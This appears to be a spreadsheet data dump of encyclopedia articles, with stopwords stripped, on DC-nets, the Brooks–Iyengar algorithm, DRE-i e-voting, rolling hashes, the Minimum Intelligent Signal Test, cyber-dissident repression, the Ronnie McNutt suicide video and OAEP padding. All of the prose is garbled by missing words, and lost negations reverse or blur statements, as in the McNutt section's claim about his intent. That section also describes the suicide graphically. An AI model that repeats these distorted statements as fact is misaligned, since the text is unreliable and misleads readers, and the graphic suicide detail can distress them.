graphs protocol less fully connected secret sharing graphs, improve performance scalability practical dc-net implementations, potential risk reducing anonymity colluding participants split secret sharing graph separate connected components. example, intuitively appealing less secure generalization {\displaystyle n&gt;3} participants using ring topology, cryptographer sitting around table shares secret cryptographer immediate left right, every cryptographer. such topology appealing cryptographer needs coordinate coin flips round, rather {\displaystyle however, adam charlie actually agents sitting immediately left right bob, innocent victim, adam charlie secretly collude reveal secrets other, determine certainty whether sender dc-net run, regardless many participants total. this colluding participants adam charlie effectively "split" secret sharing graph separate disconnected components, containing bob, containing honest participants. another compromise secret sharing dc-net topology, employed dissent system scalability, described client/server user/trustee topology. variant, assume types participants playing different roles: potentially large number users desire anonymity, much smaller number {\displaystyle trustees whose role help users obtain anonymity. topology, {\displaystyle users shares secret {\displaystyle trustees—but users share secrets directly users, trustees share secrets directly trustees—resulting {\displaystyle n\times secret sharing matrix. number trustees {\displaystyle small, user needs manage shared secrets, improving efficiency users ring topology does. however, long least trustee behaves honestly leak secrets collude participants, honest trustee forms "hub" connecting honest users single fully connected component, regardless many users and/or trustees might dishonestly colluding. users need know guess trustee honest; security depends existence least honest, non-colluding trustee. alternate alphabets combining operators though simple dc-nets protocol uses binary digits transmission alphabet, uses operator combine cipher texts, basic protocol generalizes alphabet combining operator suitable one-time encryption. this flexibility arises naturally fact secrets shared many pairs participants are, effect, merely one-time pads combined symmetrically within single dc-net round. useful alternate choice dc-nets alphabet combining operator finite group suitable public-key cryptography alphabet—such schnorr group elliptic curve—and associated group operator dc-net combining operator. such choice alphabet operator makes possible clients zero-knowledge proof techniques prove correctness properties dc-net ciphertexts produce, participant "jamming" transmission channel, without compromising anonymity offered dc-net. this technique first suggested golle juels, developed franck, later implemented verdict, cryptographically verifiable implementation dissent system. handling avoiding collisions measure originally suggested david chaum avoid collisions retransmit message collision detected, paper explain exactly arrange retransmission. dissent avoids possibility unintentional collisions using verifiable shuffle establish dc-nets transmission schedule, participant knows exactly bits schedule correspond transmission slot, know owns transmission slots. countering disruption attacks herbivore divides large anonymity network smaller dc-net groups, enabling participants evade disruption attempts leaving disrupted group joining another group, participant finds group free disruptors. this evasion approach introduces risk adversary owns many nodes could selectively disrupt groups adversary completely compromised, thereby "herding" participants toward groups functional precisely completely compromised.dissent implements several schemes counter disruption. original protocol used verifiable cryptographic shuffle form dc-net transmission schedule distribute "transmission assignments", allowing correctness subsequent dc-nets ciphertexts verified simple cryptographic hash check. this technique required fresh verifiable every dc-nets round, however, leading high latencies. later, efficient scheme allows series dc-net rounds proceed without intervening shuffles absence disruption, response disruption event uses shuffle distribute anonymous accusations enabling disruption victim expose prove identity perpetrator. finally, recent versions support fully verifiable dc-nets substantial cost computation efficiency public-key cryptography dc-net well hybrid mode uses efficient xor-based dc-nets normal case verifiable dc-nets upon disruption, distribute accusations quickly feasible using verifiable shuffles. references</t>
  </si>
  <si>
    <t>Brooks–Iyengar algorithm</t>
  </si>
  <si>
    <t>brooks–iyengar algorithm brooks–iyengar hybrid algorithm distributed algorithm improves precision accuracy interval measurements taken distributed sensor network, even presence faulty sensors. sensor network exchanging measured value accuracy value every node every node, computes accuracy range measured value whole network values collected. even data sensors faulty, sensor network malfunction. algorithm fault-tolerant distributed. could also used sensor fusion method. precision accuracy bound algorithm proved 2016. background brooks–iyengar hybrid algorithm distributed control presence noisy data combines byzantine agreement sensor fusion. bridges sensor fusion byzantine fault tolerance. this seminal algorithm unified disparate fields first time. essentially, combines dolev's algorithm approximate agreement mahaney schneider's fast convergence algorithm (fca). algorithm assumes processing elements (pes), faulty behave maliciously. takes input either real values inherent inaccuracy noise (which unknown), real value apriori defined uncertainty, interval. output algorithm real value explicitly specified accuracy. algorithm runs o(nlogn) number pes. possible modify algorithm correspond crusader's convergence algorithm (cca), however, bandwidth requirement also increase. algorithm applications distributed control, software reliability, high-performance computing, etc. algorithm brooks–iyengar algorithm executed every processing element (pe) distributed sensor network. each exchanges measured interval network. "fused" measurement weighted average midpoints regions found. concrete steps brooks–iyengar algorithm shown section. each performs algorithm separately: input: measurement sent closed interval {\displaystyle [l_{k,i},h_{k,i}]} {\displaystyle 1\leq k\leq output: output includes point estimate interval estimate receives measurements pes. divide union collected measurements mutually exclusive intervals based number measurements intersect, known weight interval. remove intervals weight less {\displaystyle n-\tau {\displaystyle \tau number faulty intervals left, {\displaystyle a_{i}} denote remaining intervals. {\displaystyle a_{i}=\{(i_{1}^{i},w_{1}^{i}),\dots ,(i_{l}^{i},w_{l}^{i})\}} interval {\displaystyle i_{l}^{i}=[l_{i_{l}^{i}},h_{i_{l}^{i}}]} {\displaystyle w_{l}^{i}} weight associated interval {\displaystyle i_{l}^{i}} also assume {\displaystyle h_{i_{l}^{i}}\leq h_{i_{l+1}^{i}}} calculate point estimate {\displaystyle v_{i}'} {\displaystyle v_{i}'={\frac {\sum _{l}{\frac {(l_{i_{l}^{i}}+h_{i_{l}^{i}})\cdot w_{l}^{i}}{2}}}{\sum _{l}w_{l}^{i}}}} interval estimate {\displaystyle [l_{i_{1}^{i}},h_{i_{l}^{i}}]} example: consider example pes, {\displaystyle s_{5}} sending wrong values exchange values. values received {\displaystyle s_{1}} next table. draw weighted region diagram (wrd) intervals, determine {\displaystyle a_{1}} according algorithm: {\displaystyle a_{1}=\{([1.5,2.7],4),([2.7,2.8],5),([2.8,3.2],4)\}} consists intervals least {\displaystyle n-\tau 5−1) measurements intersect. output equal 2.625 {\displaystyle {\frac {4*{\frac {1.5+2.7}{2}}+5*{\frac {2.7+2.8}{2}}+4*{\frac {2.8+3.2}{2}}}{13}}=2.625} interval estimate {\displaystyle [1.5,3.2]} similar, could obtain inputs results pes: related algorithms 1982 byzantine problem: byzantine general problem extension generals' problem could viewed binary problem. 1983 approximate consensus: method removes values consists scalars tolerant faulty inputs. 1985 in-exact consensus: method also uses scalar input. 1996 brooks-iyengar algorithm: method based intervals. 2013 byzantine vector consensus: method uses vectors input. 2013 multidimensional agreement: method also vectors input measure distance different. could approximate consensus (scalar-based), brooks-iyengar algorithm (interval-based) byzantine vector consensus (vector-based) deal interval inputs, paper proved brooks–iyengar algorithm best here. application brooks–iyengar algorithm seminal work major milestone distributed sensing, could used fault tolerant solution many redundancy scenarios. also, easy implement embed networking systems.in 1996, algorithm used minix provide accuracy precision, leads development first version rt-linux. 2000, algorithm also central darpa sensit program's distributed tracking program. acoustic, seismic motion detection readings multiple sensors combined distributed tracking system. besides, used combine heterogeneous sensor feeds application fielded technologies, systems, penn state applied research lab(arl), usc/isi. thales group, defense manufacturer, used work global operational analysis laboratory. applied raytheon's programs many systems need extract reliable data unreliable sensor network, exempts increasing investment improving sensor reliability. also, research developing algorithm results tools used navy maritime domain awareness software. education, brooks–iyengar algorithm widely used teaching classes university wisconsin, purdue, georgia tech, clemson university, university maryland, etc. addition area sensor network, fields time-triggered architecture, safety cyber-physical systems, data fusion, robot convergence, high-performance computing, software/hardware reliability, ensemble learning artificial intelligence systems could also benefit brooks–iyengar algorithm. algorithm characteristics also awards recognition inventors brooks iyengar algorithm brooks iyengar received prestigious year test time award pioneering research high impact brooks-iyengar algorithm. high impact research work influenced numerous government programs commercial products. iyengar receiving award prof steve yau, ieee iyengar student brooks references</t>
  </si>
  <si>
    <t>Direct Recording Electronic with integrity</t>
  </si>
  <si>
    <t>direct recording electronic integrity (dre-i) end-to-end (e2e) verifiable e-voting system, first designed feng matthew kreeger 2010 formally published 2014 additional authors brian randell, dylan clarke, siamak shahandashti, peter hyun-jeen lee. dre-i first verifiable e-voting system without involving tallying authorities. authors call tallying-authority-free voting system "self-enforcing e-voting". removal tallying authorities realized dre-i pre-computing encrypted ballots structured election, multiplying ciphertexts cancel random factors, hence allowing public observer verify tallying integrity. improved version called dre-i enhanced privacy (dre-ip), adopts real-time computation strategy instead pre-computation strategy, successfully trialed polling station gateshead 2019 local elections. protocol {\displaystyle {\displaystyle large primes, {\textstyle q\,|\,p-1} {\displaystyle generator subgroup {\displaystyle z_{p}^{*}} prime order {\displaystyle parameters {\displaystyle (p,q,g)} publicly agreed election. modulo operations performed respect modulus {\displaystyle protocol also implemented using elliptic curve, specification remains same. following example, protocol explained context single-candidate yes/no election held supervised polling stations using touch-screen machines. there standard ways extend single candidate election support multiple candidates, e.g., providing yes/no selection candidates using encoded values candidates. protocol also implemented internet voting done verifiable classroom voting.the dre-i protocol consists three phases: setup, voting tallying. setup dre-i implementation include server distributed clients connect server secure channel. before election, server pre-computes table shown below. table contains {\displaystyle rows corresponding ballot. number {\displaystyle larger maximum number eligible voters accommodate voter auditing. {\displaystyle ballots, server chooses random secret {\displaystyle x_{i}\in _{r}[1,q-1]} computes corresponding public {\displaystyle g^{x_{i}}} when done ballots, server computes restructured public every ballot follows: yes/no value ballot encrypted form {\displaystyle c_{i}=g^{x_{i}y_{i}}\cdot g^{v_{i}}} {\displaystyle v_{i}} "no" "yes". addition, machine computes 1-out-of-2 zero-knowledge proof (zkp) yes/no value. this ensure encrypted vote well-formed. words, value vote {\displaystyle v_{i}} either when pre-computation finished, server publishes random public keys restructured public keys (first three columns setup table) keeping cryptograms secret (last columns). voting after authentication polling station, voter obtains random password smart card logs onto client private voting booth. casting vote involves basic steps. step one, voter selects choice, "yes" "no", candidate shown touch screen. upon selection, machine prints following data paper receipt: ballot serial number {\displaystyle cryptogram selected choice, along digital signature proving data authenticity.in step two, voter option either confirm cancel previous selection. confirm option chosen, machine prints “finish” paper receipt digital signature indicate valid ballot cast. hand, cancel option selected, machine prints canceled candidate choice plain text cryptogram, along digital signature. case, dummy vote cast. voter check canceled candidate choice printed receipt matches selection; not, dispute raised election staff polling station. this "confirm/cancel" option enables voter verify vote "cast intended". voter cast many dummy votes wish (subject reasonable limit), allowed cast valid vote.all receipts published public bulletin board (i.e., mirrored public website), together digital signatures prove data authenticity. after voting, voter leaves voting booth receipt receipt voter chooses cancel ballots). voter checks content receipt published bulletin board. this ensures vote "recorded cast". tallying when election finished, server announces tally "yes" votes. addition, publishes "yes" "no" cryptograms unused ballots bulletin board, canceled voters. example bulletin board election shown below. verify tally announced server, simply multiplies published votes {\displaystyle v_{i}} canceled (dummy) unused votes, no-votes included multiplication. computation, random factors cancelled exponent {\textstyle \sum _{i}{x_{i}y_{i}}=0} based cancellation technique used anonymous veto network. this leaves {\textstyle \sum _{i}v_{i}} exponent. verify tally {\displaystyle announced server, needs check following equation holds. this ensures votes "tallied recorded", together earlier assurance "cast intended" "recorded cast" ensures entire voting process end-to-end verifiable. implementation practical applications prototype verifiable classroom voting system, based dre-i protocol, implemented pedagogical purposes used classroom voting student prize competitions. limitation dre-i protocol works pre-computing encrypted ballots. however, pre-computed ballots need stored securely. pre-computed ballots revealed, secrecy votes compromised (however, tallying integrity remains intact guaranteed end-to-end verifiability). this limitation addressed using different real-time computation strategy leads improved protocol called dre-i enhanced privacy (dre-ip). both dre-i dre-ip protocols end-to-end verifiable without tallying authorities, contrast verifiable e-voting schemes involve tallying authorities performing decryption tallying operations. also voting machine references</t>
  </si>
  <si>
    <t>Rolling hash</t>
  </si>
  <si>
    <t>rolling hash (also known recursive hashing rolling checksum) hash function input hashed window moves input. hash functions allow rolling hash computed quickly—the hash value rapidly calculated given hash value, value removed window, value added window—similar moving average function computed much quickly low-pass filters. main applications rabin–karp string search algorithm, uses rolling hash described below. another popular application rsync program, uses checksum based mark adler's adler-32 rolling hash. bandwidth network filesystem (lbfs) uses rabin fingerprint rolling hash. fastcdc (fast content-defined chunking) uses compute-efficient gear fingerprint rolling hash. best, rolling hash values pairwise independent strongly universal. they cannot 3-wise independent, example. polynomial rolling hash rabin–karp string search algorithm often explained using rolling hash function uses multiplications additions: {\displaystyle h=c_{1}a^{k-1}+c_{2}a^{k-2}+c_{3}a^{k-3}+...+c_{k}a^{0}} ,where {\displaystyle constant, {\displaystyle c_{1},...,c_{k}} input characters (but function rabin fingerprint, below). order avoid manipulating huge {\displaystyle values, math done modulo {\displaystyle choice {\displaystyle {\displaystyle critical good hashing; linear congruential generator discussion. removing adding characters simply involves adding subtracting first last term. shifting characters position left requires multiplying entire {\displaystyle {\displaystyle shifting characters position right requires dividing entire {\displaystyle {\displaystyle note modulo arithmetic, {\displaystyle chosen multiplicative inverse {\displaystyle a^{-1}} {\displaystyle multiplied result division without actually performing division. rabin fingerprint rabin fingerprint another hash, also interprets input polynomial, galois field gf(2). instead seeing input polynomial bytes, seen polynomial bits, arithmetic done gf(2) (similarly crc32). hash result division polynomial irreducible polynomial gf(2). possible update rabin fingerprint using entering leaving byte, making effectively rolling hash. because shares author rabin–karp string search algorithm, often explained another, simpler rolling hash, simpler rolling hash also polynomial, rolling hashes often mistaken other. backup software restic uses rabin fingerprint splitting files, blob size varying 512kib 8mib. cyclic polynomial hashing cyclic polynomial—sometimes called buzhash—is also simple, benefit avoiding multiplications, using barrel shifts instead. form tabulation hashing: presumes hash function {\displaystyle characters integers interval {\displaystyle [0,2^{l})} this hash function might simply array hash table mapping characters random integers. function {\displaystyle cyclic binary rotation circular shift): rotates bits left, pushing latest first position. e.g., {\displaystyle s(101)=011} {\displaystyle \oplus bitwise exclusive hash values defined {\displaystyle h=s^{k-1}(h(c_{1}))\oplus s^{k-2}(h(c_{2}))\oplus \ldots \oplus s(h(c_{k-1}))\oplus h(c_{k}),} multiplications powers implemented binary shifts. result number {\displaystyle [0,2^{l})} computing hash values rolling fashion done follows. {\displaystyle previous hash value. rotate {\displaystyle once: {\displaystyle h\leftarrow s(h)} {\displaystyle c_{1}} character removed, rotate {\displaystyle times: {\displaystyle s^{k}(h(c_{1}))} then simply {\displaystyle h\leftarrow s(h)\oplus s^{k}(h(c_{1}))\oplus h(c_{k+1}),} {\displaystyle c_{k+1}} character. hashing cyclic polynomials strongly universal pairwise independent: simply keep first {\displaystyle l-k+1} bits. that take result {\displaystyle dismiss {\displaystyle k-1} consecutive bits. practice, achieved integer division {\displaystyle h\rightarrow h\div 2^{k-1}} content-based slicing using rolling hash interesting cases rolling hash function create dynamic, content-based chunks stream file. this especially useful required send changed chunks large file network: simple byte addition front file would normally cause fixed size windows become updated, reality, first "chunk" modified. simple approach making dynamic chunks calculate rolling hash, hash value matches arbitrary pattern (e.g. zeroes) lower bits (with probability {\textstyle \over 2^{n}}} given hash uniform probability distribution) it’s chosen chunk boundary. each chunk thus average size {\textstyle 2^{n}} bytes. this approach ensures unmodified data (more window size away changes) boundaries. once boundaries known, chunks need compared cryptographic hash value detect changes. backup software attic uses buzhash algorithm customizable chunk size range splitting file streams. content-based slicing using moving several programs, including gzip (with --rsyncable option) rsyncrypto, content-based slicing based specific (unweighted) moving sum: 8195 {\displaystyle s(n)=\sum _{i=n-8195}^{n}c_{i},} 4096 {\displaystyle h(n)=s(n)\mod 4096,} {\displaystyle s(n)} 8196 consecutive bytes ending byte {\displaystyle (requires bits storage), {\displaystyle c_{i}} byte {\displaystyle file, {\displaystyle h(n)} "hash value" consisting bottom bits {\displaystyle s(n)} .shifting window byte simply involves adding character subtracting oldest character longer window) sum. every {\displaystyle {\displaystyle h(n)==0} programs file {\displaystyle {\displaystyle n+1} this approach ensure change file affect current possibly next chunk, chunk. gear fingerprint content-based chunking algorithm fastcdc content-defined chunking (cdc) algorithm needs compute hash value data stream byte byte split data stream chunks hash value meets predefined value. however, comparing string byte-by-byte introduce heavy computation overhead. fastcdc proposes efficient content-defined chunking approach. uses fast rolling gear hash algorithm, skipping minimum length, normalizing chunk-size distribution, last least, rolling bytes time speed algorithm, achieve higher throughput rabin-based approach.the basic version pseudocode provided follows: algorithm fastcdc input: data buffer src, data length output: point minsize split minimum chunk size maxsize 64kb split maximum chunk size minsize mask 0x0000d93003530000ll buffer size less minimum chunk size minsize return maxsize maxsize gear[src[i]] !(fp mask) return return where gear array pre-calculated hashing array. here fastcdc uses gear hashing algorithm calculate rolling hashing results quickly keep uniform distribution hashing results rabin. compared traditional rabin hashing algorithm, achieves much faster speed. experiments suggest generate nearly chunk size distribution much shorter time (about 1/10 rabin-based chunking segmenting data stream. computational complexity rolling hash functions linear number characters, complexity respect length window {\displaystyle varies. rabin–karp rolling hash requires multiplications {\displaystyle -bit numbers, integer multiplication {\displaystyle o(k\log k2^{o(\log ^{*}k)})} hashing ngrams cyclic polynomials done linear time. software rollinghashcpp free-software implementation several rolling hash functions rollinghashjava apache-licensed java implementation rolling hash functions also minhash w-shingling external links 6.006: introduction algorithms 2011- recitation rolling hash footnotes</t>
  </si>
  <si>
    <t>Minimum intelligent signal test</t>
  </si>
  <si>
    <t>minimum intelligent signal test, mist, variation turing test proposed chris mckinstry boolean (yes/no true/false) answers given questions. purpose test provide quantitative statistical measure humanness, subsequently used optimize performance artificial intelligence systems intended imitate human responses. mckinstry gathered approximately 80,000 propositions could answered e.g.: earth planet? abraham lincoln president united states? bigger foot? people sometimes lie?he called propositions mindpixels. these questions test specific knowledge aspects culture, basic facts meaning various words concepts. could therefore compared sat, intelligence testing controversial measures mental ability. mckinstry's distinguish shades intelligence identify whether computer program could considered intelligent all. according mckinstry, program able much better chance large number mist questions would judged level intelligence understanding. example, 20-question test, program guessing answers random, could expected score correct average. probability program scoring correct guesswork 220, i.e. 1,048,576; program able sustain level performance several independent trials, prior access propositions, considered intelligent. discussion mckinstry criticized existing approaches artificial intelligence chatterbots, saying questions could "kill" programs quickly exposing weaknesses. contrasted approach, series direct questions assessing ai's capabilities, turing test loebner prize method engaging undirected typed conversation. critics mist noted would easy "kill" mckinstry-style too, impossibility supplying correct answers possible yes/no questions ways finite human-generated mindpixels: fact answer question bigger foot?" correctly mean answer variations like bigger hand liver yolk alpha centauri ...)" correctly, too. however, late mckinstry might replied truly intelligent, knowledgeable entity humans) would able work answers (yes know ...) applying knowledge relative sizes objects named. words, mist intended test suggestion implementing also argued mist objective test intelligence turing test, subjective assessment might consider measure interrogator's gullibility machine's intelligence. according argument, human's judgment turing test vulnerable eliza effect, tendency mistake superficial signs intelligence real thing, anthropomorphizing program. response, suggested alan turing's essay "can machines think?", program convincing imitation intelligent being, fact intelligent. dispute thus means program "real" intelligence, signs detected. similar debate exists controversy great language, nonhuman primates said learned aspects sign languages significance learning disputed. external links minimum intelligent signal test: alternative turing test, chris mckinstry, canadian artificial intelligence gac-80k open source software performing minimum intelligent signal test</t>
  </si>
  <si>
    <t>Political repression of cyber-dissidents</t>
  </si>
  <si>
    <t>political repression cyber-dissidents oppression persecution people expressing political views internet. along development internet, state authorities many parts world moving forward install mass surveillance electronic communications, establish internet censorship limit flow information, persecute individuals groups express "inconvenient" political views internet. many cyber-dissidents found persecuted attempts bypass state controlled news media. reporters without borders released handbook bloggers cyber-dissidents maintains roster currently imprisoned cyber-dissidents. iran mohamad reza nasab abdolahi imprisoned publishing open letter ayatollah khamenei. pregnant wife bloggers commented arrest also imprisoned. saudi arabia raif badawi, saudi arabian writer activist creator website free saudi liberals, convicted crimes including "setting website undermines general security" "ridiculing islamic religious figures." sentenced seven years prison lashes 2013, resentenced 1000 lashes years prison plus fine million riyal (equal $267,000). wife, ensaf haidar, asserted raif able survive flogging. egypt several bloggers egypt arrested allegedly defaming president hosni mubarak expressing critical views islam. blogger kareem amer convicted four years prison. china chinese communist party general secretary jintao ordered "maintain initiative opinion internet raise level guidance online," referring censorship ensuring online messages china party line. china reported internet police force reportedly numbering 30,000 trawl[ing] websites chat rooms, erasing anti-communist comments posting pro-government messages." however, number internet police personnel challenged chinese authorities. amnesty international blamed several companies, including google, microsoft yahoo!, collusion chinese authorities restrict access information internet identify cyber-dissidents hiring "big mamas".it reported departments provincial municipal governments mainland china began creating "teams internet commentators, whose guide discussion public bulletin boards away politically sensitive topics posting opinions anonymously false names" 2005. applicants drawn mostly propaganda police departments. successful candidates offered classes marxism, propaganda techniques, internet. "they actually hiring staff curse online," said chinese student arrested posting comments blogs.foreign ministry spokesperson zhaoxu objected question foreign journalists regarding cyber-dissident, stating "there dissidents china". weiwei believes that, statement, government effectively stating that: dissidents criminals, criminals dissenting views, anyone believes china dissidents criminal, ultimately china dissidents criminals. russia 2006 journalist vladimir rakhmankov published article internet named vladimir putin "the nation's phallic symbol". regional court found rakhmankov guilty offending vladimir putin fined 20,000 roubles (~us$680).in june 2013 criminal case opened opposition blogger stanislav kalinichenko retweeting photograph leaflet reading "enough demonstrating—it's time act!" signed group calling first resistance detachment calling destruction corrupt officials' property. kalinichenko charged criminal code ("calling publicly extremist acts"), carrying years prison sentence. human rights organization memorial characterized charges politically motivated.in march 2014, orders attorney general, government blocked blog opposition leader alexey navalny grounds disseminated extremism. december 2015 facebook complied order attorney general block russian users' access event page organizers unsanctioned rally support navalny brothers. reposts event disappeared users' walls. addition, supervisory body roskomnadzor ordered ukrainian news website delete story protest.in march 2014 historian konstantin zharinov charged advocating extremism, using "share friends" vkontakte feature public appeal ukrainian militant group right sector. zharinov placed surveillance, participation anti-war demonstrations pickets support alexey navalny featured prominently investigation.on march 2022, belarusian political police gubopik arrested detained editor russian wikipedia minsk mark bernstein, editing wikipedia article russian invasion ukraine, accusing "spread anti-russian materials" violating russian "fake news" law. tunisia lawyer human rights defender mohammed abbou imprisoned criticizing torture site. bangladesh asif mohiuddin, winner bobs-best online activism award, imprisoned bangladesh government posting "offensive comments islam mohammed". deutsche welle state "asif's blog read pages bangladesh known strong criticism religious fundamentalism bangladesh's 'anti-people politics'" international organisations, including human rights watch, amnesty international, reporters without borders committee protect journalists condemned imprisonment bloggers climate fear journalists. head reporters without borders asia-pacific commented murder writer avijit noting unacceptable [police] spend much time searching news outlets, arresting journalists, censoring news investigating bloggers, many attacks bloggers still unpunished." vietnam nguyen binh imprisoned writing violations human rights, truong quoc arrested discussing political reforms internet chat room. nguyen binh released june 2007. pakistan january 2017, four bloggers known anti-religious pro-democracy activism went missing. altogether, disappearances alarmed secular liberals involved social activism pakistan. united states australian whistleblower, activist founder wikileaks julian assange became dissident publishing secret documents proved american crimes afghanistan iraq. also cyber-dissident internet censorship sociology internet sorm, russia's electronic surveillance program references external links internet human rights amnesty international today, chance fight hi-tech tyranny guardian unlimited</t>
  </si>
  <si>
    <t>Ronnie McNutt death video case</t>
  </si>
  <si>
    <t>august 2020, ronald merle mcnutt, 33-year-old american man, fatally shot head facebook livestream, went viral social media platforms. case became notable callous attitude expressed towards mcnutt's death internet users, well facebook's slow response video, shared numerous platforms amassed large view count finally taken down. video platform tiktok also slow respond video, appeared many user feeds constant re-uploads, leading many users choosing boycott platform. case raised awareness suicide prevention duty care social media platforms protect users victim reputations online comes graphic content. biography ronnie mcnutt (may 1987 august 2020) resident mississippi united states, served military iraq. mcnutt worked toyota plant albany, lived seemingly stable life, known suffered variety mental health problems, depression well post-traumatic stress disorder, latter direct consequence time served iraq war. addition also dealing recent break-up girlfriend; media reports also said lost covid-19 pandemic, though rolling stone disputed this. mcnutt christian regularly attended church. suicide august 2020, mcnutt began livestream social media website facebook. best friend, joshua steen, encountered stream. initially find unusual, mcnutt routinely done livestreams past, became alarmed realized mcnutt intoxicated holding single-shot rifle. steen allegedly attempted intervene numerous times, particularly mcnutt misfired gun, hoping facebook would stream video feed, preventing people seeing mcnutt's home steen sought police intervention. facebook refused stream, claiming stream violation platform's guidelines. stream went mcnutt's mobile phone rang frequently. last call received ex-girlfriend answered, leading brief argument two. immediately mcnutt would hang phone her, exclaimed "hey guys, guess it." proceeding fatally shoot head, prompting friend's wander room. phone would ring instantly gunshot blew face head away. stream captured multiple attending parties. albany police department called scene livestream, enter mcnutt's apartment died. police chief chris robertson secured perimeter, evacuating nearby residents attempting communicate mcnutt speakerphone, avail.a final message ronnie mcnutt later discovered facebook, declaring, "someone life needs hear matter. that loved. that future. tell them". viral spread video mcnutt's suicide uploaded users across social media platforms facebook, youtube, tiktok, instagram, often short video clip feeds unsuspecting users. mcnutt expressed intent viral spread occur. variants video appeared tiktok's "fyp" (for page), users would scroll upon without warning suicide automatically played, apparent intention frightening upsetting viewers form trolling. #ronniemcnutt hashtag 15.6 million views tiktok within first days suicide. though platforms worked remove videos, uploads would appear separate accounts, links video also began appear reddit's true crime communities. tiktok caught onto video algorithms, uploaders evaded detection placing video pictures unrelated, innocuous content. public response incident compared filmed suicides anchorwoman christine chubbuck politician budd dwyer. large margin response online sympathy towards mcnutt, users using case opportunity discuss mental health suicide prevention, well concern video's prevalence online. some tiktok users announced boycotts platform suicide video completely taken down, users began posting prayers messages respect commemoration mcnutt comments sections video uploads.many parents reported children highly distressed encountering video, girl becoming physically needing sleep lights another parent argued fears children, accidentally discovered video tiktok, post-traumatic stress disorder. institute mums circulated warnings parents seemingly benign video content hiding mcnutt video, stating, "alarmingly, also reports video sandwiched middle cute funny videos, begin viewer-friendly footage quickly changing disturbing suicide." then australian prime minister scott morrison called video something child exposed to", cybersecurity expert susan mclean publicly recommended parents prevent minor children accessing tiktok video fully removed. liability case sparked debate legal liability owed internet platforms fail promptly remove graphic disturbing footage public view, blame generally placed facebook failing livestream initial suicide attempt itself. josh steen called facebook multiple times, called police, neither stopped stream mcnutt already committed suicide. steen declared, woman posts topless photo, software detect that, remove account. that's apparently offensive friend killing himself." argued platforms "dark web" responsible ongoing circulation video.tiktok released public statement saying, "our systems automatically detecting flagging clips violating policies content displays, praises, glorifies, promotes suicide. appreciate community members who've reported content warned others watching, engaging sharing videos platform, respect person family." facebook, likewise, publicly stated, removed original video facebook last month, streamed, used automation technology remove copies uploads since time. thoughts remain ronnie's family friends difficult time." also suicide kevin whitrick, another controversy involving footage livestreamed suicide distributed across internet references</t>
  </si>
  <si>
    <t>Optimal asymmetric encryption padding</t>
  </si>
  <si>
    <t>cryptography, optimal asymmetric encryption padding (oaep) padding scheme often used together encryption. oaep introduced bellare rogaway, subsequently standardized pkcs#1 2437. oaep algorithm form feistel network uses pair random oracles process plaintext prior asymmetric encryption. when combined secure trapdoor one-way permutation {\displaystyle processing proved random oracle model result combined scheme semantically secure chosen plaintext attack (ind-cpa). when implemented certain trapdoor permutations (e.g., rsa), oaep also proven secure chosen ciphertext attack. oaep used build all-or-nothing transform. oaep satisfies following goals: element randomness used convert deterministic encryption scheme (e.g., traditional rsa) probabilistic scheme. prevent partial decryption ciphertexts information leakage) ensuring adversary cannot recover portion plaintext without able invert trapdoor one-way permutation {\displaystyle .the original version oaep (bellare/rogaway, 1994) showed form "plaintext awareness" (which claimed implies security chosen ciphertext attack) random oracle model oaep used trapdoor permutation. subsequent results contradicted claim, showing oaep ind-cca1 secure. however, original scheme proved random oracle model ind-cca2 secure oaep used permutation using standard encryption exponents, case rsa-oaep. improved scheme (called oaep+) works trapdoor one-way permutation offered victor shoup solve problem. more recent work shown standard model (that hash functions modeled random oracles) impossible prove ind-cca2 security rsa-oaep assumed hardness problem. algorithm diagram, mask generating function, usually mgf1, hash chosen hash function, hlen length output hash function bytes, length modulus bytes, message padded {\displaystyle k-2\cdot \mathrm {hlen} bytes), optional label associated message (the label empty string default used authenticate data without requiring encryption), byte string {\displaystyle k-\mathrm {mlen} -2\cdot \mathrm {hlen} null-bytes. xor-operation. encoding 8017 pkcs#1 v2.2 specifies oaep scheme follows encoding: hash label using chosen hash function: {\displaystyle \mathrm {lhash} =\mathrm {hash} (l)} generate padding string consisting {\displaystyle k-\mathrm {mlen} -2\cdot \mathrm {hlen} bytes value 0x00. concatenate lhash, single byte 0x01, message form data block {\displaystyle \mathrm {db} =\mathrm {lhash} ||\mathrm {ps} ||\mathrm {0x01} ||\mathrm this data block length {\displaystyle k-\mathrm {hlen} bytes. generate random seed length hlen. mask generating function generate mask appropriate length data block: {\displaystyle \mathrm {dbmask} =\mathrm {mgf} (\mathrm {seed} ,k-\mathrm {hlen} -1)} mask data block generated mask: {\displaystyle \mathrm {maskeddb} =\mathrm {db} \oplus \mathrm {dbmask} mask generating function generate mask length hlen seed: {\displaystyle \mathrm {seedmask} =\mathrm {mgf} (\mathrm {maskeddb} ,\mathrm {hlen} mask seed generated mask: {\displaystyle \mathrm {maskedseed} =\mathrm {seed} \oplus \mathrm {seedmask} encoded (padded) message byte 0x00 concatenated maskedseed maskeddb: {\displaystyle \mathrm {em} =\mathrm {0x00} ||\mathrm {maskedseed} ||\mathrm {maskeddb} decoding decoding works reversing steps taken encoding algorithm: hash label using chosen hash function: {\displaystyle \mathrm {lhash} =\mathrm {hash} (l)} reverse step split encoded message byte 0x00, maskedseed (with length hlen) maskeddb: {\displaystyle \mathrm {em} =\mathrm {0x00} ||\mathrm {maskedseed} ||\mathrm {maskeddb} generate seedmask used mask seed: {\displaystyle \mathrm {seedmask} =\mathrm {mgf} (\mathrm {maskeddb} ,\mathrm {hlen} reverse step recover seed seedmask: {\displaystyle \mathrm {seed} =\mathrm {maskedseed} \oplus \mathrm {seedmask} generate dbmask used mask data block: {\displaystyle \mathrm {dbmask} =\mathrm {mgf} (\mathrm {seed} ,k-\mathrm {hlen} -1)} reverse step recover data block {\displaystyle \mathrm {db} =\mathrm {maskeddb} \oplus \mathrm {dbmask} reverse step split data block parts: {\displaystyle \mathrm {db} =\mathrm {lhash'} ||\mathrm {ps} ||\mathrm {0x01} ||\mathrm verify that: lhash' equal computed lhash consists bytes 0x00 separated 0x01 byte first byte byte 0x00. conditions met, padding invalid.usage rsa: encoded message encrypted rsa. deterministic property avoided using oaep encoding seed randomly generated influences entire encoded message. security "all-or-nothing" security fact recover must recover entire maskeddb entire maskedseed; maskeddb required recover seed maskedseed, seed required recover data block maskeddb. since changed cryptographic hash completely changes result, entire maskeddb, entire maskedseed must completely recovered. implementation pkcs#1 standard, random oracles identical. pkcs#1 standard requires random oracles mgf1 appropriate hash function. also encapsulation references</t>
  </si>
  <si>
    <t>Discrete logarithm records</t>
  </si>
  <si>
